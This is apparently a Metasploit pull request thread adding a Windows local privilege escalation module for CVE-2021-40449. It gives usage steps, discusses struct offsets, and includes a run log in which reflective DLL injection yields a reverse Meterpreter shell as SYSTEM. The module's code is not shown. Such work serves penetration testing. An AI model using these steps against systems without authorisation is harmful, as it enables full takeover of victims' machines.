Add Exploit for CVE-2021-40449

[gwillcox-r7]

Add in an exploit for CVE-2021-40449 as described as being exploited in the wild at https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/. Work was taken from the POC at https://github.com/ly4k/CallbackHell from @ly4k, which builds off of the work at https://github.com/KaLendsi/CVE-2021-40449-Exploit from @KaLendsi. Additional info came from https://mp.weixin.qq.com/s/AcFS0Yn9SDuYxFnzbBqhkQ and the Red Raindrop Team of the Qi'anxin Threat Intelligence Center who did a very detailed writeup of this vulnerability.

This exploit should work against Windows 10 x64 build 14393 and 17763, however it should also work against older versions of Windows 10 as well. Newer versions of Windows 10 introduced additional protections that may make some of the exploit techniques utilized by this exploit irrelevant so I'm not sure how exploitation fairs on newer versions of Windows, however its likely that older versions such as Windows 7 could also be exploited with some tweaks to this exploit.

Verification

List the steps needed to make sure this thing works

• Start msfconsole
• Gain a shell on a Windows 10 x64 machine running build 17763 that has not gotten the October 2021 patches yet.
• use exploit/windows/local/cve_2021_40449
• Set the settings appropriately for SESSION, LHOST, etc.
• exploit
• Verify you get a shell as SYSTEM.
• Document any issues encountered

[github-actions]

Thanks for your pull request! Before this pull request can be merged, it must pass the checks of our automated linting tools.

We use Rubocop and msftidy to ensure the quality of our code. This can be ran from the root directory of Metasploit:

rubocop <directory or file>
tools/dev/msftidy.rb <directory or file>

You can automate most of these changes with the -a flag:

rubocop -a <directory or file>

Please update your branch after these have been made, and reach out if you have any problems.

[timwr]

This should be 0xe98 for Microsoft Windows [Version 10.0.17763.1] but I'm not sure how it's calculated for other versions.

[gwillcox-r7]

Odd, see the documentation, I tested this on a 10.0.17763 install with fairly recent patches and this worked fine. Are you implying that something changed the structures between when 10.0.17763 first came out and the latest patches? I would find that hard to believe given most of these structures stay the same between major releases but it is possible, just would want to see some more evidence given this worked for me in my tests so that we know specifically what was changed and address it appropriately.

Keep in mind this code is taken from https://github.com/ly4k/CallbackHell; I have not modified @ly4k's code very much; mainly made some minor changes to get things to compile without warnings where possible and made some type changes where it made sense. The logic of the code should still be the same though as I didn't touch anything like this.

[timwr]

Apologies 0xe20 works too

[gwillcox-r7]

All good, was just curious if I had missed something :) I'll leave this issue open in case we encounter problems down the line though; will be good to reference this to check if its related

[timwr]

Confirmed working on Windows 10 1809

msf6 exploit(windows/local/cve_2021_40449) > run

[!] SESSION may not be compatible with this module:
[!]  * missing Meterpreter features: stdapi_sys_process_set_term_size
[*] Started reverse TCP handler on 192.168.0.18:5555
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Target's build number: 10.0.17763.1
[+] The target appears to be vulnerable. Vulnerable Windows 10 v1809 build detected!
[*] Launching msiexec to host the DLL...
[+] Process 5056 launched.
[*] Reflectively injecting the DLL into 5056...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (200262 bytes) to 192.168.0.18
[*] Meterpreter session 2 opened (192.168.0.18:5555 -> 192.168.0.18:33542 ) at 2021-11-07 23:43:49 +0000

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

[smcintyre-r7]

You should take a look at external/source/include/windows/definitions.h which includes a bunch of definitions that you have here. Should be able to include that rather than redefining them here.

[gwillcox-r7]

@smcintyre-r7 @h00die 9f9942f should incorporate the rest of both of your feedback.

[timwr]

LGTM. Nice work.
I can land this once the tests pass

[timwr]

Release notes

Adds a module for CVE-2021-40449 aka CallbackHell, a Windows local privilege escalation exploit caused by a use after free during the NtGdiResetDC callback in vulnerable versions of win32k.sys.